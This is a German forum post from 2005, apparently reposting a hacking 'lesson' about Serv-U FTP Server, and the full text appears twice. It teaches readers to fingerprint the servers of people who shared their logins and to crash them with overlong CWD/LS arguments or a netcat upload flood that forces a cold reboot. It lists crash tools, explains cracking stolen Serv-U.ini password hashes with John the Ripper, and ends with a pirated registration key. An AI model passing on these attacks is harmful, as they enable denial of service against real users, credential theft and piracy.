Sam2k
05.01.2005, 12:39
Serv-U FTP Server Tricks:
====================
Yeah, eine neue Lesson die fertig ist und nur darauf wartet von euch wißbegierigen
Cyberjunkies gelesen zu werden. Lange Rede kurzer Unsinn...
... hier in dieser Lesson geht es um den wohl bekannten Serv-U FTP Server.
Serv-U ist ein Tool mit dem jeder auf einfachste Weise einen "FTP-Server" aufziehen kann,
bei dem jeder down- bzw. uploaden kann. Da sich immer mehr in Chats wichtig (ohhh!) tun,
indem sie dann sagen: "hey, das kannst Du von meinem FTP Server saugen" dachte ich
das ich mal ein Tutor schreibe, was einige Lücken in Serv-U einschließt, da ich mir das
mit dem "FTP Server" nicht ziehen kann.
Also, das was Du zuerst brauchst ist jemanden der Serv-U hat, und Dir anbietet das Du
Dir was von ihm downloaden kannst. Der jeweilige Gegenüber muß Dir seine IP, sowie
Benutzernamen und Paßwort mitteilen. Hast Du dies, beginnt der eigentliche Spaß :)
Um herauszubekommen auf wen Serv-U registriert ist und welche Version läuft, telnettest
Du ihn erstmal. Das heisst: "Start", "Ausführen" und dann "telnet IP 21".
Hier ist "IP" die IP Adresse des FTP "Anbieters" und 21 der FTP Port, der aber variieren kann.
So, sobald dies geschehen ist öffnet sich eine Telnet-Session und verbindet Dich prompt
mit Serv-U: "220 Serv-U FTP-Server v2.5e for WinSock ready..."
Aha, Version 2.5e ist also schonmal aktiv... hmmm... weiter...
Tipp nun den Befehl "help" ein und schon sollte Dein Telnet Fenster ungefähr so aussehen:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~
220 Serv-U FTP-Server v2.5e for WinSock ready...
help
214- The following commands are recognized (* => unimplemented).
USER PORT RETR ALLO DELE SITE XMKD CDUP
PASS PASV STOR REST CWD STAT RMD XCUP
ACCT TYPE APPE RNFR XCWD HELP XRMD STOU
REIN STRU SMNT RNTO LIST NOOP PWD SIZE
QUIT MODE SYST ABOR NLST MKD XPWD MDTM
214 Serv-U version 2.5.5.2, registered to: Cyberdemon_98,BiBLE Demonstration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~
Und was kannst Du nun an Infos erkennen ??? Ganz klar, wie schon erwähnt die
Version 2.5e und registriert ist diese auf den Namen "Cyberdemon_98" und als Company
"BiBLE Demonstration". Na, das war ja einfach... :)
Das war schonmal das erste in dieser Lesson... jetzt weiter...
Und jetzt crashen wir mal Serv-U :). Dazu haben wir mehrere Möglichkeiten... via Befehle
oder die faulen unter uns benutzen vorgefertigte Programme.
Zuerst führe ich hier die Befehls-Version auf...
Du verbindest Dich mit dem Serv-U Server, teilst ihm Benutzernamen und Passwort mit.
Da Du nun eingeloggt bist, tippst Du mal folgendes Kommando oder läßt dies tun (CuteFTP):
CWD xxx155 (die xxxx155 stehen für 155 Zeichen), z.B. "CWD aaaaaaaa", wobei das
aaaa jetzt 155 Mal vorkommen muß. Anstatt des CWD Befehls kannst Du auch "LS" benutzen.
Serv-U stürzt nun auf der Gegenseite ohne jegliche Fehlermeldung ab.
Wenn Du eine Zeichenlänge größer als 155 Zeichen nutzt, beschwert sich Serv-U mit einer
Fehlermeldung und bricht ebenfalls zusammen. Sollte Serv-U Server auf einer Windows
NT Maschine gestartet sein, kommt noch Dr.Watson hinzu :)
Eine weitere DoS Attacke ist Serv-U unter Windows 98 zu attackieren. Loggt euch in
den Server ein, und uploadet eine Datei mit mindestens 1 MB Größe.
Benutzt folgenden Befehl: "cat dateiname | nc ipadresse 21".
Dieser Upload führt einen TCP/IP StackOverFlow herbei. Die Verbindung zum Internet
wird nach ca. 10 Sekunden getrennt und die Maschine muß einen Kaltstart erhalten um
wieder funktionsfähig arbeiten zu können. Unter Windows NT hängt das Programm, die
CPU-Auslastung steht bei 100%, jedoch stürzt Serv-U nicht ab.
Und da wir nun damit fertig sind, folgt hier die Beschreibung via Programm.
Ihr könnt Serv-U mit folgenden Programmen crashen:
* Serv-U 2.5b Broken Link Uploader (www.ussrback.com)
* Serv-U FTP-Server v2.5a, Denial of Service (www.ussrback.com)
* ServU 2.x StackOverFlow by -=d0c=-
Der Absturz auf der Gegenseite via StackOverFlow sieht so aus:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SERV-U32 verursachte einen Fehler durch eine ungültige Seite
in Modul SERV-U32.EXE bei 014f:0042ff05.
Register:
EAX=00000002 CS=014f EIP=0042ff05 EFLGS=00010207
EBX=00cf86dc SS=0157 ESP=0063fecc EBP=006400cc
ECX=00cf8580 DS=0157 ESI=00000003 FS=1a17
EDX=00000000 ES=0157 EDI=00000200 GS=3dc7
Bytes bei CS:EIP:
53 8b 5d 08 68 00 02 00 00 8d 85 00 fe ff ff 50
Stapelwerte:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
und Serv-U schließt sich :). Na wie gemein....
Zu guter letzt will ich Dir noch etwas über die Verschlüsselung des Benutzer-Paßwortes erzählen.
Die Paßwörter befinden sich verschlüsselt in der Serv-u.ini im Serv-U Verzeichnis und sieht
ungefähr folgendermaßen aus:
[USER=test]
Password=pjFny6A9HXcg2
HomeDir=c:\
TimeOut=45
Das Beispiel enthält den Benutzer "test", das (noch) verschlüsselte Passwort "tesd", sowie einige
weitere Infos. Wenn Du nun, wie auch immer, die Serv-u.ini eines anderen ergattert hast, dann
kannst Du diese cracken, indem Du einen BruteForce Cracker wie John The Ripper benutzt.
John ist ja bekanntlicherweise ein Unix Passwort Cracker, also mußt Du ein Unix Dummy Passwd
File anlegen, was ca. so aussehen sollte:
root:pjFny6A9HXcg2:0:0:root:/root:/bin/bash
Nun läßt Du nur noch John über dieses Passwd Dummy laufen und schon hast Du das Passwort.
Und wieder ist eine lange, lange Lesson zu Ende und wiedermal hoffe ich, daß ich wieder etwas
Wissen vermitteln konnte.
Dann wünsch ich noch viel Spaß beim Crashen und Telnetten von Serv-U FTP Servern, schießt
mal ein paar Grüße von mir mit über die Leitung ;)
und denn bis zum nächsten Male sagt
Cyberdemon_98
P.S.: Die Shareware Version bekommst Du bei http://ftpserv-u.deerfield.com/ und um die
häßliche Shareware zu registrieren kannst Du folgenden Key benutzen:
SsEWfIGzikY,Cyberdemon_98,BiBLE Demonstration
danke an TNO [The Nameless One's] für den Keygen :)
====================
Yeah, eine neue Lesson die fertig ist und nur darauf wartet von euch wißbegierigen
Cyberjunkies gelesen zu werden. Lange Rede kurzer Unsinn...
... hier in dieser Lesson geht es um den wohl bekannten Serv-U FTP Server.
Serv-U ist ein Tool mit dem jeder auf einfachste Weise einen "FTP-Server" aufziehen kann,
bei dem jeder down- bzw. uploaden kann. Da sich immer mehr in Chats wichtig (ohhh!) tun,
indem sie dann sagen: "hey, das kannst Du von meinem FTP Server saugen" dachte ich
das ich mal ein Tutor schreibe, was einige Lücken in Serv-U einschließt, da ich mir das
mit dem "FTP Server" nicht ziehen kann.
Also, das was Du zuerst brauchst ist jemanden der Serv-U hat, und Dir anbietet das Du
Dir was von ihm downloaden kannst. Der jeweilige Gegenüber muß Dir seine IP, sowie
Benutzernamen und Paßwort mitteilen. Hast Du dies, beginnt der eigentliche Spaß :)
Um herauszubekommen auf wen Serv-U registriert ist und welche Version läuft, telnettest
Du ihn erstmal. Das heisst: "Start", "Ausführen" und dann "telnet IP 21".
Hier ist "IP" die IP Adresse des FTP "Anbieters" und 21 der FTP Port, der aber variieren kann.
So, sobald dies geschehen ist öffnet sich eine Telnet-Session und verbindet Dich prompt
mit Serv-U: "220 Serv-U FTP-Server v2.5e for WinSock ready..."
Aha, Version 2.5e ist also schonmal aktiv... hmmm... weiter...
Tipp nun den Befehl "help" ein und schon sollte Dein Telnet Fenster ungefähr so aussehen:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~
220 Serv-U FTP-Server v2.5e for WinSock ready...
help
214- The following commands are recognized (* => unimplemented).
USER PORT RETR ALLO DELE SITE XMKD CDUP
PASS PASV STOR REST CWD STAT RMD XCUP
ACCT TYPE APPE RNFR XCWD HELP XRMD STOU
REIN STRU SMNT RNTO LIST NOOP PWD SIZE
QUIT MODE SYST ABOR NLST MKD XPWD MDTM
214 Serv-U version 2.5.5.2, registered to: Cyberdemon_98,BiBLE Demonstration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~
Und was kannst Du nun an Infos erkennen ??? Ganz klar, wie schon erwähnt die
Version 2.5e und registriert ist diese auf den Namen "Cyberdemon_98" und als Company
"BiBLE Demonstration". Na, das war ja einfach... :)
Das war schonmal das erste in dieser Lesson... jetzt weiter...
Und jetzt crashen wir mal Serv-U :). Dazu haben wir mehrere Möglichkeiten... via Befehle
oder die faulen unter uns benutzen vorgefertigte Programme.
Zuerst führe ich hier die Befehls-Version auf...
Du verbindest Dich mit dem Serv-U Server, teilst ihm Benutzernamen und Passwort mit.
Da Du nun eingeloggt bist, tippst Du mal folgendes Kommando oder läßt dies tun (CuteFTP):
CWD xxx155 (die xxxx155 stehen für 155 Zeichen), z.B. "CWD aaaaaaaa", wobei das
aaaa jetzt 155 Mal vorkommen muß. Anstatt des CWD Befehls kannst Du auch "LS" benutzen.
Serv-U stürzt nun auf der Gegenseite ohne jegliche Fehlermeldung ab.
Wenn Du eine Zeichenlänge größer als 155 Zeichen nutzt, beschwert sich Serv-U mit einer
Fehlermeldung und bricht ebenfalls zusammen. Sollte Serv-U Server auf einer Windows
NT Maschine gestartet sein, kommt noch Dr.Watson hinzu :)
Eine weitere DoS Attacke ist Serv-U unter Windows 98 zu attackieren. Loggt euch in
den Server ein, und uploadet eine Datei mit mindestens 1 MB Größe.
Benutzt folgenden Befehl: "cat dateiname | nc ipadresse 21".
Dieser Upload führt einen TCP/IP StackOverFlow herbei. Die Verbindung zum Internet
wird nach ca. 10 Sekunden getrennt und die Maschine muß einen Kaltstart erhalten um
wieder funktionsfähig arbeiten zu können. Unter Windows NT hängt das Programm, die
CPU-Auslastung steht bei 100%, jedoch stürzt Serv-U nicht ab.
Und da wir nun damit fertig sind, folgt hier die Beschreibung via Programm.
Ihr könnt Serv-U mit folgenden Programmen crashen:
* Serv-U 2.5b Broken Link Uploader (www.ussrback.com)
* Serv-U FTP-Server v2.5a, Denial of Service (www.ussrback.com)
* ServU 2.x StackOverFlow by -=d0c=-
Der Absturz auf der Gegenseite via StackOverFlow sieht so aus:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SERV-U32 verursachte einen Fehler durch eine ungültige Seite
in Modul SERV-U32.EXE bei 014f:0042ff05.
Register:
EAX=00000002 CS=014f EIP=0042ff05 EFLGS=00010207
EBX=00cf86dc SS=0157 ESP=0063fecc EBP=006400cc
ECX=00cf8580 DS=0157 ESI=00000003 FS=1a17
EDX=00000000 ES=0157 EDI=00000200 GS=3dc7
Bytes bei CS:EIP:
53 8b 5d 08 68 00 02 00 00 8d 85 00 fe ff ff 50
Stapelwerte:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
und Serv-U schließt sich :). Na wie gemein....
Zu guter letzt will ich Dir noch etwas über die Verschlüsselung des Benutzer-Paßwortes erzählen.
Die Paßwörter befinden sich verschlüsselt in der Serv-u.ini im Serv-U Verzeichnis und sieht
ungefähr folgendermaßen aus:
[USER=test]
Password=pjFny6A9HXcg2
HomeDir=c:\
TimeOut=45
Das Beispiel enthält den Benutzer "test", das (noch) verschlüsselte Passwort "tesd", sowie einige
weitere Infos. Wenn Du nun, wie auch immer, die Serv-u.ini eines anderen ergattert hast, dann
kannst Du diese cracken, indem Du einen BruteForce Cracker wie John The Ripper benutzt.
John ist ja bekanntlicherweise ein Unix Passwort Cracker, also mußt Du ein Unix Dummy Passwd
File anlegen, was ca. so aussehen sollte:
root:pjFny6A9HXcg2:0:0:root:/root:/bin/bash
Nun läßt Du nur noch John über dieses Passwd Dummy laufen und schon hast Du das Passwort.
Und wieder ist eine lange, lange Lesson zu Ende und wiedermal hoffe ich, daß ich wieder etwas
Wissen vermitteln konnte.
Dann wünsch ich noch viel Spaß beim Crashen und Telnetten von Serv-U FTP Servern, schießt
mal ein paar Grüße von mir mit über die Leitung ;)
und denn bis zum nächsten Male sagt
Cyberdemon_98
P.S.: Die Shareware Version bekommst Du bei http://ftpserv-u.deerfield.com/ und um die
häßliche Shareware zu registrieren kannst Du folgenden Key benutzen:
SsEWfIGzikY,Cyberdemon_98,BiBLE Demonstration
danke an TNO [The Nameless One's] für den Keygen :)